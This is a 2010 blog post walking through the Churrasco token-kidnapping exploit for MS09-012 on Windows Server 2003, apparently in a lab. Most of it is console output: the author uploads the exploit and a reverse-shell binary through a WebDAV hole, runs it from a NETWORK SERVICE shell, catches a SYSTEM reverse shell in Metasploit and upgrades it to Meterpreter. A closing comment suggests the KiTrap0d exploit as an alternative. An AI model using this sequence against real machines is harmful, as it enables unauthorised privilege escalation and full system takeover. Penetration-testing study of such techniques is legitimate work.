Monday, May 10, 2010

Playing with the MS09-012 Windows Local Exploit


Back in 09 there was a buzz about token kidnapping by Argeniss
http://www.argeniss.com/research.html

http://www.argeniss.com/research/TokenKidnapping.pdf

subsequently patched http://www.microsoft.com/technet/security/bulletin/MS09-012.mspx

I'm normally violently against uploading binaries to boxes but until the local exploit functionality is added to msf...

The gist is you an run the Churrasco binary and it will execute a command for you as SYSTEM from NETWORK SERVICE (the shell privs you get when exploiting IIS). See the slides for more.

Lets see it in action.

We have our network service shell, push up our churrasco binary, metasploit payload, and run it.

*I had issues on my VM getting staged payloads in msf to run, so I opted for a shell/reverse_tcp and then tried to upgrade the shell to meterpreter.
[*] Meterpreter session 3 opened (192.168.6.94:443 -> 192.168.6.94:62700)

meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > pwd
c:\windows\system32\inetsrv
Upload the exploit binary and your reverse shell binary. I used the webdav vuln that got me on the box to upload it as churrasco.bin, network service is weird about where it can write to, but it should be writable somewhere if you don't have the file upload route.
meterpreter > shell
Process 3872 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\windows\system32\inetsrv>cd C:\Inetpub\wwwroot
C:\Inetpub\wwwroot>dir
dir
Volume in drive C has no label.
Volume Serial Number is F48F-220E

Directory of C:\Inetpub\wwwroot

05/10/2010 06:53 AM .
05/10/2010 06:53 AM ..
05/10/2010 06:53 AM 410,624 Churrasco.bin
02/21/2003 06:48 PM 1,433 iisstart.htm
05/10/2010 07:19 AM 37,888 shell.bin
05/10/2010 07:43 AM 173 test4.asp;.txt
4 File(s) 2,105,685 bytes
2 Dir(s) 36,227,641,344 bytes free
Let's run the exploit and have it kick off our reverse shell back to us. Set up the multi/handler... blah blah
C:\Inetpub\wwwroot>Churrasco.bin shell.bin
Churrasco.bin shell.bin
/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 668
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 672
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 676
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 680
/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0x730
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found NETWORK SERVICE Token
/churrasco/-->Found LOCAL SERVICE Token
/churrasco/-->Found SYSTEM token 0x728
/churrasco/-->Running command with SYSTEM Token...
/churrasco/-->Done, command should have ran as SYSTEM
on the multi/handler side...
[*] Command shell session 1 opened (192.168.6.94:443 -> 192.168.6.94:62854)


(C) Copyright 1985-2003 Microsoft Corp.

C:\Inetpub\wwwroot>whoami
whoami
nt authority\system

C:\Inetpub\wwwroot>^Z
Background session 1? [y/N] y
msf exploit(handler) > sessions -u 1
msf exploit(handler) > [*] Meterpreter session 2 opened (192.168.6.94:443 -> 192.168.6.94:62855)

msf exploit(handler) > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 shell Microsoft Windows [Version 5.2.3790] 192.168.6.94:443 -> 192.168.6.94:62854
2 meterpreter NT AUTHORITY\SYSTEM @ LAB 192.168.6.94:443 -> 192.168.6.94:62855

msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
CG

1 comment:

CG said...

jduck brought up a good point that if a box is vuln to ms09-012 then its also vuln to KiTrap0d and you can just got that route without uploading anything special.